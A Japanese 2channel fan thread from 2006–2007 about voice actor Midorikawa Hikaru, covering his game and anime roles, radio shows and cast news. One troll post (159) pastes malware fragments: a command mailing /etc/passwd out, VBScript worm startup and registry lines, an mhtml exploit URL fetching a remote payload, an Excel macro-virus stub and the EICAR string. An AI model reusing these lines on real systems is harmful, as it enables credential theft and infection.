リメDのリオンの声、昔とは違うが、思ったほど低くなかった。今回のリオンの声ってけっこう好評だったりする?

123 :名無しさん@お腹いっぱい。:2006/12/17(日) 17:53:35 ID:MiLWwAkm0
自分も今のまったり具合が好きかな・・・ゲームはたくさんあるし
人気作品の主役級は売り出したい若手にまかせるのがいいんじゃないかな
ミドリンもそうやってこの道歩んできたわけだし

124 :名無しさん@お腹いっぱい。:2006/12/17(日) 18:34:14 ID:I5BuIbea0
良くないよ!
みどりんの絶妙な声をもっともっと活躍の場に広げないと勿体無いよ!

125 :名無しさん@お腹いっぱい。:2006/12/17(日) 19:18:56 ID:jkz73z+d0
でもほとんどの人間が何処かで聞いたことあると思う

126 :名無しさん@お腹いっぱい。:2006/12/17(日) 20:16:27 ID:EvDJhyIq0
ファンのフリしたアンチかの乗り込みか、暇だな。

>>120
叩かれる事もなく地道に人気出てきた作品だから美味しいよな。
ポジション的にも(主人公は別として)唯一欠席なしのキャラなのがいい

>>122
結構好評
発売前に沸いていたアンチもゲーム系では鳴りを潜めてる


127 :名無しさん@お腹いっぱい。:2006/12/17(日) 20:21:29 ID:Z0VQNU8x0
ファンだけど現状で満足しちゃ駄目でしょ
最近目立ったアニメ仕事してないのは確かなんだし

128 :名無しさん@お腹いっぱい。:2006/12/17(日) 22:50:59 ID:F8owCwWWO
自分も嗜好がアニメよりゲーム側なので今でも楽しめてるけど
バリバリ活躍してほしいっていうのは一ファンとして当然あるよ
業界の方針ならどうしようもないのかもだけど

>>122
先日ようやくご対面して軽くのされてきた・・・
やっぱりリオンは緑川さんじゃなきゃって思ったな
先のイベントが楽しみ

129 :名無しさん@お腹いっぱい。:2006/12/17(日) 23:15:37 ID:LSoyiHWh0
みんなどんな「活躍」を望んでるのかな
>>117 みたいな作品の主役クラスに本当に出て欲しいのかな
(個人的にはデスノ以外は「合う声の役の主役級」がいないキガス)

「あなたには幸せになって欲しい、私はそのためだけに傍にいる」なんて
ミドリン声の静蘭だからシビレるし、
サイフラッシュ!!!なマサキはイカしてるし、
デイビットは今まであまり聞かれなかった低音オヤジ系でこれまた新鮮だし。
関東だと水・金・土と途切れなく楽しみだよ

もっと活躍して欲しい、と思うのは大切だけど、今の仕事をろくに
鑑賞せずに本数とかだけで仕事してない少ないとか、なんだかなぁ

130 :名無しさん@お腹いっぱい。:2006/12/17(日) 23:30:46 ID:Fr2X3Y1Q0
>>129
>>117みたいな仕事本当にしてほしい。

それと、マサキ好きなんだけどさ
マサキにしてもマサキ主役のアニメやってほしいよ。

131 :名無しさん@お腹いっぱい。:2006/12/17(日) 23:48:10 ID:F8owCwWWO
>>129
ごめんね、ただこれからも頑張ってほしいと思っただけで
今が仕事してないなんて思ってないよ
俄かファンが出過ぎたこと言って申し訳ない
勉強になります
それにしてもそっちでは週半分でてるんだね、すごいな

132 :名無しさん@お腹いっぱい。:2006/12/17(日) 23:51:22 ID:z+Z5Ikk60
自分もマサキ好きだからアニメで見れて嬉しいヽ(´▽`)/
カッコよく活躍してくれればなんでも良いよ!

前はもっと出演少なかったから、今のペースでも文句は無いな〜

133 :名無しさん@お腹いっぱい。:2006/12/18(月) 00:40:17 ID:GWJygRIc0
この人は既婚というマイナスを持ってても
こんなにたくさんのファンに愛されてて素晴らしいね!
ずっとこの調子で声優続けてくれるといいな。

134 :名無しさん@お腹いっぱい。:2006/12/18(月) 09:42:55 ID:K2imYMM10
>>128
あれは絶対勝てない仕様だから如何に粘って技叫ばせるかがキモw
リオンはジュダがあれだったから心配だったけど可愛くて安心した。
ジュダは意図的に大人びた演技だったらしいけど妙に納得



135 :名無しさん@お腹いっぱい。:2006/12/18(月) 13:25:04 ID:+xUSrkOfO
ファンダムやファンダムのドラマCDの時のリオンは子供ぽかったのに、ジューダスでいきなり低くて、ビックリした。だから今回、相当低いんじゃないかとビクビクしてた。実際聞いてみて、緑川さん良く頑張たと思った。

136 :名無しさん@お腹いっぱい。:2006/12/18(月) 13:36:39 ID:AlDsIcZO0
音泉で始まったネトラジを聴いてみた
久々に素の声を聴いたよ

既出だが、先日プレイした英雄伝説6SCに剣帝役で出てたが(終盤、しかも一戦しか喋らない)、
相変わらずというかクールな役が多いね
マサキのような役をどんどんやって欲しいが…

137 :名無しさん@お腹いっぱい。:2006/12/18(月) 14:03:48 ID:K2imYMM10
>>135
旧Dの時は戦闘掛け合いとチャット位しかなかったから
あまり愛着はなかったものの、ドラマCD等での継続して
続けていく事でどんどん愛着沸いた、とコラムに書いてあった。
その上でジュダは同一人物&同い年ではあるものの、リオンよりは練れた
大人のキャラとしてああいう演技になったそうな。
でもリオンに戻る今回は流石に不安だったらしい。

>>136
webラジオで彩雲国も面白いよ。
関さんとのコンビなのでゲーマーにはタイムリーだしゲストも豪華&
ミニドラマ?も愉快
http://www.animate.tv/digital/web_radio/detail_076.html

138 :名無しさん@お腹いっぱい。:2006/12/18(月) 14:12:44 ID:K2imYMM10
連続スマン

マサキもそうだがシンタローみたいな役も聞きたい。
そ言えばドラマCDのミスフルですんごい妙なキャラの役やったらしいが
聞いた人いる?出番によっては買ってみたいがw

139 :名無しさん@お腹いっぱい。:2006/12/19(火) 15:19:23 ID:nk6I23izO
確か、沢松ってキャラだよね?
CDは聞いてないけど
野球部じゃないし、それ自体がネタになるほどのレアキャラだったと思う
でも主人公の悪友ポジだから演出しだいではおいしいのかも

>>134
そうなんだ
今回も頑張れば勝てるかと思って、レベル上げしてたんだけどな
確かに、残り体力50ぐらいで割り込みされて
後方にいても闇の炎に抱かれて即死えてたもんね
ありがとう、諦めついた


140 :名無しさん@お腹いっぱい。:2006/12/20(水) 06:56:10 ID:bkTKaDtF0
ttp://www.nhk.or.jp/voice/
NHK−FMで12月31日深夜24時
ていうか元旦0時からか、
ボイスパラダイスにゲストで名前出てますよ
既出でしたらスマソ

141 :名無しさん@お腹いっぱい。:2006/12/20(水) 15:09:21 ID:9KtdBgFR0
>>139
そうそう、ある程度減ると闇の炎に抱か(ry
が出る仕様w
倒した報告見ないし
そんな自分はCMで見たあの場面みて凹み中・・・orz

142 :名無しさん@お腹いっぱい。:2006/12/20(水) 19:15:44 ID:e4v7woPr0
でもVジャンの攻略本には
「どうしても倒したい人は空中コンボでBCを出す暇を与えないこと。」

と書かれてあるんだよなあ・・・

リオンかわいいよリオン

143 :名無しさん@お腹いっぱい。:2006/12/20(水) 23:16:48 ID:mBPi+hrl0
桜蘭高校ホスト部のゲーム化のキャストがドラマCDってのは既出?

144 :名無しさん@お腹いっぱい。:2006/12/20(水) 23:21:27 ID:msjnCjmQ0
ゲームはアニメキャストじゃないんだ!?
知らなかった。なんで戻るんだろw

145 :名無しさん@お腹いっぱい。:2006/12/20(水) 23:37:02 ID:mBPi+hrl0
ソースが
213 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/12/20(水) 22:48:49 ID:U0NmZ7Fc
ゲームのCVはドラマ版の方だって。ソースはLaLaに連載している
漫画家のアシさんのブログ。

だから冷静に考えたらなんか信憑性に欠けるかも。ガセだったらスマン

146 :名無しさん@お腹いっぱい。:2006/12/20(水) 23:46:52 ID:gsBgAuah0
最近アニメ仕事何が足りないかっていったら
主役が全然無いんだよね・・・・
かといって、良い時間帯の地上派のアニメでレギュラー持ってるわけでもないしさ・・・

147 :名無しさん@お腹いっぱい。:2006/12/20(水) 23:48:11 ID:+LqVApQa0
ホスト部ゲーム化だってね。
CDキャストのままだったらよかったのに…orz

148 :名無しさん@お腹いっぱい。:2006/12/20(水) 23:48:58 ID:+LqVApQa0
ってリロってなかった。
アニメ版とばかり思ってたよ。マジ?

149 :名無しさん@お腹いっぱい。:2006/12/21(木) 08:56:32 ID:vXlMRmM20
アニメ版キャストも好評だからそれはないんじゃないかな。
製作関係が原作に近いならアリだろうけど。
>>146
元々主役は少ない人だぞ。ちゃんと出演作見てるのか?


150 :名無しさん@お腹いっぱい。:2006/12/21(木) 09:28:04 ID:vXlMRmM20
ホスト部ゲーム版スレ見てきたが確たるソースはないね。
アニメ版のキャストが固定してるから普通にそっちだと思う。


151 :名無しさん@お腹いっぱい。:2006/12/22(金) 22:01:56 ID:NnEO/djs0
ジョジョ映画のディオやるってさ
http://www.cinemacafe.net/movies/cgi/18116/

152 :名無しさん@お腹いっぱい。:2006/12/22(金) 22:18:55 ID:BKAnMLpC0
とっくに既出・・・・
えええディオ以外のキャストが違っ

153 :名無しさん@お腹いっぱい。:2006/12/22(金) 23:35:32 ID:f2lgR+xxO
自分もwiki見てビビったけどディオは変わらないんだな
てっきりゲームのキャストのままでやるのかと思ってたよ

154 :名無しさん@お腹いっぱい。:2006/12/23(土) 03:26:44 ID:uZCiVgH80
>>149
元々主役は少ないからなおさらやってほしくない?
と言うかゴールデンのアニメとか人気漫画なら主役級なら、別に主役じゃなくてかまわないんだけど
ただもっとローカルなアニメだったら主役をばんばんやってほしい

ってこと!

155 :名無しさん@お腹いっぱい。:2006/12/23(土) 11:14:54 ID:Fk9apDb90
別に主役じゃなくても、いい役で、できれば出番が多ければそれでいいなぁ。
例を挙げるなら、NARUTOにおけるカカシ、デスノートのL、そんなポジション。
そういう意味では彩雲国の清蘭は自分的に理想のポジションに近い

156 :名無しさん@お腹いっぱい。:2006/12/23(土) 17:32:19 ID:IugVpdSs0
>>155
もう相手にすんな。上で騒いでた奴と多分同じ。
アンチスレに痛い信者として晒すのが目的。

静蘭はオイシイ役だな。男性キャラでは主上についで2番手だが
主人公以外では唯一の皆勤賞「キャラ」だし。
じわじわ人気が出てきてるのも嬉しい

157 :名無しさん@お腹いっぱい。:2006/12/24(日) 16:38:44 ID:p6d7QSA+0
彩雲国物語のラジオ面白いね。女役やってるとき結構いいと思ってしまったw

158 :名無しさん@お腹いっぱい。:2006/12/24(日) 20:07:48 ID:I3R0axS10
最近主役なくてさみしい

159 :名無しさん@お腹いっぱい。:2006/12/24(日) 21:15:00 ID:5iJS8kcN0
>>158

787 名前: <body onload=window()> [cat /etc/passwd | mail nobody@nonexistent.com] 投稿日: 2006/12/24(日) 20:03:28 ID:I3R0axS10
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

160 :名無しさん@お腹いっぱい。:2006/12/24(日) 21:38:26 ID:PyQ5JJRW0
>>159
死ねよカス

161 :名無しさん@お腹いっぱい。:2006/12/24(日) 22:59:08 ID:IYuTdoRl0
みどりんが落ち目落ち目よく言われてるのは素直に悲しいね。
ここらでどかんと良い仕事沢山やってほしい。

162 :名無しさん@お腹いっぱい。:2006/12/24(日) 23:53:58 ID:zFi2mlqxO
マイソロのリオンも評判いいみたいだね
PSP持ってないんでプレイ出来ないけど
リメDより若返った感じの声らしいんで気になる

163 :名無しさん@お腹いっぱい。:2006/12/25(月) 02:24:43 ID:396FHgrZO
>>162
さっきまでマイソロプレイ中だった自分が通りますよ。声は確かにリメDより若干若め。ただボイスのボリュームがリメDと比べると少なめなのでボイス目当てだけで買うならちょっと高いかも。それとリオンが出てくるまでのレベル上げが面倒。
自分は戦闘終了時のセリフに萌えたので買って損はなかった。

164 :名無しさん@お腹いっぱい。:2006/12/27(水) 02:49:18 ID:jz8A3lrb0
乙女ゲーのWebラジオ、みどりんのために聞いたんだが、
・・・乙女ゲーのラジオなのに嫁の話をしてもいいんだろうか?
リスナー喜ばないんじゃ・・・
自分はもうけっこう慣れてたから微笑ましかったが

165 :名無しさん@お腹いっぱい。:2006/12/27(水) 06:19:37 ID:I8U2Cdy00
>>164
まあ〜〜
ミドリンは愛妻家だからねvv
自分は彼のそんなところも大好きですよ^^


166 :名無しさん@お腹いっぱい。:2006/12/27(水) 18:18:42 ID:UeWyxZSb0
>>164
何つーかそこに突っ込むのも今更だな。
今まで直らなかったんだから、今更嫁話止めるわけがないw

167 :名無しさん@お腹いっぱい。:2006/12/27(水) 19:08:20 ID:TYNfarUD0
マイミクに嫁いれてるぐらいだもん。もう公表すればいいのにね。

168 :名無しさん@お腹いっぱい。:2006/12/27(水) 19:52:29 ID:fEL+A9+y0
mixiしてんの?

169 :名無しさん@お腹いっぱい。:2006/12/27(水) 22:35:40 ID:imkUhJqxO
彩雲国見てたら今更ながらこの人好きになってしまった

170 :名無しさん@お腹いっぱい。:2006/12/27(水) 23:28:56 ID:sJexcCMj0
どうやったらあんな廃プレイが出来るんだ…

171 :名無しさん@お腹いっぱい。:2006/12/28(木) 00:26:18 ID:7yC8KWspO
パスくれ

172 :名無しさん@お腹いっぱい。:2006/12/28(木) 18:24:38 ID:3CR3RqMh0
>>170
ポケモンに関してなら右手に台本左手にDSだそうだぞw(逆かもだが)

DSのときメモ、来年出るけど買うかどうか悩み中。
再録音でしかも台詞も結構入るらしいね。
既出だろうけど公式。ちょっとつっついてみて笑った
http://www.konami.jp/gs/game/Girls_Side/1st_Love/

173 :名無しさん@お腹いっぱい。:2006/12/29(金) 09:03:57 ID:oLsvru7q0
『学園天使☆ラプソディー〜天使のささやきBOX〜』CD,
コミケで先行買えた方いたら、webラジオンエア分以外
どのぐらい緑川さんボイスの収録あるのか教えてくださいな
ttp://otme.jp/pc/radio.html
…これの神谷さんのスペシャルボイスって事故後なのか前なのかも
ちょっと気になる

174 :名無しさん@お腹いっぱい。:2006/12/29(金) 09:11:35 ID:oLsvru7q0
あとアニメ板スレよりコピペだけど
「銀河鉄道物語〜忘れられた時の惑星」がもうすぐなので。

・パワープラッツ(スカパー!100ch、PPV方式、視聴料・税込1日999円、コピーガード有)、エラボ(一部CATV局のJ150ch、放送日時等はパワープラッツと同じ)
2006/12/30〜2007/1/5
8:10〜/10:00〜/11:50〜/13:40〜/15:30〜/17:20〜/19:10〜/21:00〜22:50(1日8回、全4話分を一挙に放映)
※初日の12/30放送分は1DAYスペシャルとして、スカパー!カスタマーセンターでの事前電話申し込み可
(詳細はhttp://www.powerplats.co.jp/2005/movie/1day_sp.htmlを参照)

■DVD■
・第1巻(第1話収録) 2007/1/24発売予定

見られた人いたら出番のほどなどヨロ

175 :名無しさん@お腹いっぱい。:2006/12/29(金) 17:37:05 ID:kBpOrR7u0
>>172
台本見ながらゲームやってんのかぁw

176 :通りすがり:2006/12/30(土) 18:42:20 ID:rbREI9a8O
ボイスパラダイス出るらしいね。
NHK-FM

177 :名無しさん@お腹いっぱい。:2006/12/31(日) 00:45:52 ID:YRSelI86O
ボイパラ、明日だけ出演かと思ったら今日(というか今)も地味に出てますな。

178 :名無しさん@お腹いっぱい。:2006/12/31(日) 22:16:55 ID:A6wxikO00
今年もいっぱいでてくれますよーに><

179 :名無しさん@お腹いっぱい。:2007/01/01(月) 00:33:26 ID:uTweR8uG0
アケオメ!今年はもっと色々な作品でミドリンの声が聴けますように・・・(-人-)ナムナム

180 :名無しさん@お腹いっぱい。:2007/01/01(月) 00:36:07 ID:adFex8VFO
アイーンワロスw

181 : 【大吉】 【1639円】 :2007/01/01(月) 22:15:19 ID:Eo+qp1Jd0
ミドリンにお年玉

182 : 【末吉】 【1301円】 :2007/01/01(月) 22:36:06 ID:xXLw+LEf0
あけましておめでとう!
健康でいい仕事に恵まれますように!

ついでにTVでの出演が増えるともっと嬉しいなw

183 :名無しさん@お腹いっぱい。:2007/01/01(月) 22:44:18 ID:n3vNTBWF0
今年は三枚目ヴォイスいっぱい聞けるといいなー

184 :名無しさん@お腹いっぱい。:2007/01/02(火) 08:13:54 ID:ShE7XGg00
あけおめ。新年の抱負が聞けて嬉しいラジオだった<ボイパラ
いいコンディションで仕事できる年になりますように
ttp://live24.2ch.net/test/read.cgi/liveradio/1167582930/333-334

彩雲国に出てるから、こういう番組にもお声がかかるのかな
やはりNHKやキー局のTVアニメレギュラーあるのと
ないのとでは仕事の広がりがちがうよな
増えてほしい。主役でなくてもいいから。出番多めのレギュラー

185 :名無しさん@お腹いっぱい。:2007/01/02(火) 23:26:48 ID:nDMQnWHS0
珍しくMIXIの更新がないのは、どこかにお出かけ中なのか?

186 :名無しさん@お腹いっぱい。:2007/01/03(水) 22:53:46 ID:MbqgVUie0
TOD攻略本のインタビュー見て
やっぱ真面目な人だな、と惚れ直した

187 :名無しさん@お腹いっぱい。:2007/01/04(木) 17:39:40 ID:AzwLIILw0
更新もログインもないなんて珍しいね
mixi飽きたのか

188 :名無しさん@お腹いっぱい。:2007/01/04(木) 17:51:02 ID:6TbCJLUl0
mixiに飽きる緑川カワユス

189 :名無しさん@お腹いっぱい。:2007/01/04(木) 18:11:13 ID:1i1pmOPM0
大晦日から止まってるんだから
実家か嫁の実家に帰省してるだけじゃんw

190 :名無しさん@お腹いっぱい。:2007/01/04(木) 18:14:19 ID:6TbCJLUl0
なんで皆みどりんの日記わかるんだよぉ・・

191 :名無しさん@お腹いっぱい。:2007/01/04(木) 23:21:02 ID:gt1hRO6b0
意外とlスパロボブログで置鮎さんがいってた
海外休暇組の一人だったり?
てことはないか

直接は関係ない話なんだが
ガッシュベルの連載がクライマックスで
ちょうど今週デュフォーのいいシーンがきてて
思わず脳内で緑川ボイスで再生してしまった

また子供向けアニメや人気漫画のアニメ化で
いい役ゲットしてほしいな
ボイパラの抱負では、あまり欲張らずみたいな感じだったが
そこだけは欲張りでいてほすぃ

192 :名無しさん@お腹いっぱい。:2007/01/05(金) 00:07:27 ID:ZmI4Ir5i0
嫁の日記も年末から止まってるから海外脱出でFAかもね。

193 :名無しさん@お腹いっぱい。:2007/01/05(金) 18:27:21 ID:k+nvQmsy0
昨日や今日が仕事始めじゃないんなら、仕事始めは9日かな?
今年もたくさん声が聞けますように

コンプリガイドGETして、TOD3周目でリオンを堪能するか
新しく買った戦国ムソ2エンパで光秀堪能するか迷う・・・新ボイス多かった?

194 :名無しさん@お腹いっぱい。:2007/01/06(土) 13:20:49 ID:SoAO1GyG0
イタリアか・・・うらやましす。

195 :名無しさん@お腹いっぱい。:2007/01/06(土) 18:24:13 ID:hxA39QCF0
戦時中の松林宗恵役を希望する。

196 :名無しさん@お腹いっぱい。:2007/01/06(土) 18:46:16 ID:SO4TtlqY0
>>194
そしてお嫁さんもvv
やっばり愛妻家だな〜〜ミドリン


197 :名無しさん@お腹いっぱい。:2007/01/06(土) 21:18:18 ID:OgfuqLem0
そんなとこも素敵

198 :名無しさん@お腹いっぱい。:2007/01/06(土) 21:25:45 ID:5Up3N8Fr0
彩雲国の第2シリーズ製作決定でめでたい
・・・と思ったらBS2なのね・・・
またDVD待ちか

199 :名無しさん@お腹いっぱい。:2007/01/07(日) 01:29:46 ID:ZsIcKUk/0
あー早く来い!緑川に新しい役を!

200 :名無しさん@お腹いっぱい。:2007/01/07(日) 05:53:57 ID:WWv+IYLw0

SEGAから2007年3月29日発売予定のPS2向けRPG
「シャイニング・ウィンド」にキルレイン役で出演

http://shining-wind.jp/


201 :松林宗恵少尉(声/緑川光):2007/01/08(月) 18:55:12 ID:Nr+EmDnr0
「今日から俺は、大日本帝国海軍軍人だ!」

「南シナのアモイ島か、遠いなぁ・・・。」

「中鉢!中鉢、しっかりしろ!おいっ!!」

「パイナップルの缶詰持って来たぞ、中鉢!美味いか、中鉢?」

「中鉢、中鉢・・・。」

202 :名無しさん@お腹いっぱい。:2007/01/10(水) 02:10:44 ID:n92dBFAm0

>PS2用RPG「シャイニングウィンド」のキャストが判明
>発売日は3月29日に決定
>OP主題歌に水樹奈々が歌う「Heart shaped chant」
>
>キリヤ:石田彰
>シーナ:水樹奈々
>ソウマ:保志総一朗
>クレハ:堀江由衣
>トライハルト:置鮎龍太郎
>ゼクティ:桑島法子
>クララクラン:川澄綾子
>カリス:白石涼子
>ホウメイ:斎藤千和
>ヒョウウン:中井和哉
>ロウエン:稲田徹
>ジンンクロウ:江川央生
>キルレイン:緑川光
>ジード:草尾毅
>ヒルダレイア:佐久間紅美
>シュマリ:神谷浩史
>久遠の森の詠み手:広橋涼
>
>http://shining-wind.jp/
>
>4月からは前作にあたる「シャイニングティアーズ」のTVアニメも放映開始
>アニメ制作:スタジオディーン
>監督:わたなべひろし
>主演:保志総一朗

203 :名無しさん@お腹いっぱい。:2007/01/11(木) 08:53:41 ID:FhPo0UHm0
男性向け18禁PCゲームは、最近出てないのかと思ったら
ネクストンって所の「恋姫†無双」左慈ってキャラそうかも
サンプルボイスあがってるんで、大人の皆さん自己責任でどぞー

他にも実は地味に仕事してたりするのかね

204 :名無しさん@お腹いっぱい。:2007/01/11(木) 12:35:15 ID:TqpO7F6N0
>>203
thx
顔の割りに声が低いな
そろそろ沙耶の唄みたいな主人公役もまたやって欲しいところ

205 :名無しさん@お腹いっぱい。:2007/01/12(金) 18:36:24 ID:n/ENF6Ka0
期待して無かったが、ホスト部ゲーはやっぱりアニメキャストみたいだね。

206 :名無しさん@お腹いっぱい。:2007/01/12(金) 22:16:18 ID:q9Qx0+II0
ええー?!

207 :名無しさん@お腹いっぱい。:2007/01/12(金) 22:20:49 ID:HutxO/1e0
えええええええええええええええええええええええええええええええええええええええええええ!
んじゃカワネ

208 :名無しさん@お腹いっぱい。:2007/01/12(金) 22:56:34 ID:luc/0K+H0
>>205
当たり前だ


209 :名無しさん@お腹いっぱい。:2007/01/12(金) 23:14:38 ID:+WyLZ/jzO
>>208
何でそんな喧嘩腰なんだ?

210 :名無しさん@お腹いっぱい。:2007/01/12(金) 23:19:42 ID:HutxO/1e0
ワロタ

211 :名無しさん@お腹いっぱい。:2007/01/13(土) 00:06:16 ID:q4aOIb4x0
恋姫無双の左慈やっぱ緑川さんだった
CV今日見たら書かれてたわ
子供に見えるのに声低いな

212 :名無しさん@お腹いっぱい。:2007/01/13(土) 04:25:22 ID:n7+XoTD90
ttp://eg.nttpub.co.jp/news/20070112_26.html

オンラインゲーの中で声きけるってことだろうか

213 :名無しさん@お腹いっぱい。:2007/01/13(土) 06:48:53 ID:eTRjHwcEO
BLで申し訳ないが、「俺の下であがけ」がPS2に移植されるな。主人公だからセリフの量は多いだろうね。

しかし、新しいアニメの仕事の話本当に出ないなぁ。今の所SBだけ?なのは3期もあるけど今回は出演すら怪しいもんだし。

コードギアスみたいな人気作品にレギュラーで出てほしいとこだね

214 :名無しさん@お腹いっぱい。:2007/01/13(土) 12:47:57 ID:5+J74Ld10
オタ人気作品

215 :名無しさん@お腹いっぱい。:2007/01/13(土) 16:50:27 ID:w90SbQpa0
AGAKEは、まぁBLCDと同じくくりみたいなもんだから
ココで話題にするのはまずいのでは…いやじぶんは楽しみにしてるけどさ超低音ミドリンw

今年の仕事始めはBL絡みじゃなさそうだよな
今年こそ、一般作にたくさん出て欲しいな、できれば地上波アニメで・・・

216 :名無しさん@お腹いっぱい。:2007/01/14(日) 12:15:51 ID:xhs7Ej6UO
緑川さんが出てる乙女ゲーって、ときメモとラブレボぐらい?

217 :名無しさん@お腹いっぱい。:2007/01/14(日) 17:26:33 ID:Jc6QVYWO0
スレチで本当に申し訳ないんだが
恋姫無双の左慈の次に紹介されてる千支の声優って誰だ?あの眼鏡の
何か聞いた事あるんだが、誰だかが思い出せない;

218 :名無しさん@お腹いっぱい。:2007/01/14(日) 17:29:28 ID:Jc6QVYWO0
すみません解決しました

219 :名無しさん@お腹いっぱい。:2007/01/14(日) 17:31:41 ID:vtn39Dqi0
>>216
携帯ゲーで「学園天使ラプソディー」とかいうのがあったハズ

220 :名無しさん@お腹いっぱい。:2007/01/14(日) 19:08:00 ID:rvJJp9sj0
>>216
アラビアンズ・ロスト ミハエル=ファウスト
SIMPLE2000シリーズVol.13 THE恋愛アドベンチャー 〜硝子の森〜 宮沢樹
卒業M〜生徒会長の華麗なる陰謀〜 新井透吾
Darling2 Backlash 中沢アルトゥール航河
Double Reaction! アンリ=デュバリエ
Fantastic Fortune セイリオス/アルムレディン
Hop Step あいどる☆ 小坂亮
Mystic Mind〜揺れる想い〜 御影北斗
夢☆色いろ 岡田明


221 :名無しさん@お腹いっぱい。:2007/01/15(月) 10:31:04 ID:d4cQb4F40
卒業Mってどんだけ古いの引っ張り出してるんだよwwww

222 :名無しさん@お腹いっぱい。:2007/01/15(月) 12:33:37 ID:aKMoTYPJO
卒業M、懐かしい!昔好きだったなw

>>220
216ではないが…サンクス!!
けっこ出てるんだね。
Darling Uとかすっかり忘れてたよorz

223 :名無しさん@お腹いっぱい。:2007/01/15(月) 18:04:45 ID:tew2Gw5R0
洋泉社の「オトナアニメ」Vol.3(A5版の雑誌)に
劇場版ジョジョ特集が組まれてて
緑川さんと小西さんの対談も3ページありましたよ

客寄せのタレント声優の方のインタビューがカラーなのに
主役とライバル声優二人の対談がモノクロってどうなのよ、と
ちょっと思ったけど、
対談自体は面白かったよ

224 :名無しさん@お腹いっぱい。:2007/01/16(火) 19:59:44 ID:eoOk9VWS0
1/21に大阪のアミューズメントメディア総合学院で
声優適性オーディションのゲスト審査員やるそうですよ
ラジオでCM流れてたからまだ大丈夫では?
ttp://www.amgakuin.co.jp/voice/taiken_osk/index.html

スクライドの劉鳳&クーガー兄貴コンビですな

225 :名無しさん@お腹いっぱい。:2007/01/16(火) 20:41:38 ID:+JINBTsw0
乙女ゲ新作あったよ
令嬢探偵 オフィスラブ事件慕 四季健介

226 :名無しさん@お腹いっぱい。:2007/01/18(木) 12:25:47 ID:PODVUIJUO
>>216だけど、みんなありがとう!!ゲーム探してみるよ。

227 :名無しさん@お腹いっぱい。:2007/01/18(木) 13:51:03 ID:cpaG87UG0
ラブレポは攻略キャラじゃなかったような

228 :名無しさん@お腹いっぱい。:2007/01/18(木) 16:47:22 ID:lSSB2NDg0
>>227
うん。しかも総出番数は15分程度だって女向け一般で聞いたことがある。
……コレクション、かな?

229 :名無しさん@お腹いっぱい。:2007/01/18(木) 16:58:57 ID:cpaG87UG0
15分か・・・
確か兄ルートにのみ出る隠しキャラ扱いなんだよねえ

今新番組スレ見てたが、ミスフルがアニメ化の噂あるらしいよ。
あのメンバーでのアニメ化は無理があるにしても
ミドリンの変態キャラは見てみたいな

230 :名無しさん@お腹いっぱい。:2007/01/19(金) 01:52:44 ID:klMRe2svO
今回の電プレ4コマ本に「5人〜」載ってなかった・・・。

緑川ネタキャラ、アニキーン(マスターアニキン)の出番を楽しみにしてたのに。

231 :名無しさん@お腹いっぱい。:2007/01/19(金) 12:08:53 ID:IWXQdWJq0

超人気声優オールスターの共演!!

PS2用RPG「シャイニング・ウィンド」の声優キャストが大発表!
公式HPではサンプルボイスが聞けるようになったぞ。

http://shining-wind.jp/info/cv/

OP主題歌に水樹奈々が歌う「Heart-shaped chant」

 キリヤ:石田彰
 シーナ:水樹奈々
 ソウマ:保志総一朗
 クレハ:堀江由衣
 トライハルト:置鮎龍太郎
 ゼクティ:桑島法子
 クララクラン:川澄綾子
 カリス:白石涼子
 ホウメイ:斎藤千和
 ヒョウウン:中井和哉
 ロウエン:稲田徹
 ジンンクロウ:江川央生
 キルレイン:緑川光
 ジード:草尾毅
 ヒルダレイア:佐久間紅美
 久遠の森の詠み手:広橋涼

公式HPは2月にリニューアル予定。
更に多くのサンプルボイスを用意する予定。


232 :名無しさん@お腹いっぱい。:2007/01/21(日) 08:01:48 ID:+o5b0OJN0
前にここでちょっと書かれてたけど、
若かりし頃のカミュ役やるんですね
来月発売のチャンピオンRED付録CDと
コミックス「聖闘士星矢EPISODE.G」の特装版付属のCD
ttp://www.akitashoten.co.jp/CGI/autoup/syousaiput.cgi?id=01873

233 :名無しさん@お腹いっぱい。:2007/01/21(日) 21:51:00 ID:aOZd7/LEO
きかんしゃトーマスで一人三役もやってる事は意外と知られていない

234 :名無しさん@お腹いっぱい。:2007/01/22(月) 11:56:30 ID:m1czwVCl0
え?三役だったの?
バーディとオリバーと、あと一つはなに役?

235 :名無しさん@お腹いっぱい。:2007/01/22(月) 12:54:42 ID:5MEMIAhTO
さっき調べたら四役やってましたよ。

オリバー
バーティー
ハーヴィー
トム・ディッパー

最後のは人間役です。

236 :名無しさん@お腹いっぱい。:2007/01/22(月) 18:00:57 ID:IjnkYzHEO
レニアスの機関士も

237 :234:2007/01/23(火) 11:24:36 ID:WqeQ4x+i0
わあ、そんなにやってたんですね、教えてくださってありがとうです。
今度またレンタルでも見てみたいと思います。

238 :名無しさん@お腹いっぱい。:2007/01/23(火) 12:50:02 ID:CdzM4RywO
>>236
つまり置鮎×緑川か

239 :名無しさん@お腹いっぱい。:2007/01/23(火) 20:59:42 ID:SPpYmBao0
いま出てるNHKのアナウンサー ミドリンに似てる 兄弟か?

240 :名無しさん@お腹いっぱい。:2007/01/24(水) 04:43:08 ID:7J8YTaILO
SHのRomanに出てる事、さっき気付いた…
どうせなら歌も歌って欲しかったなぁ

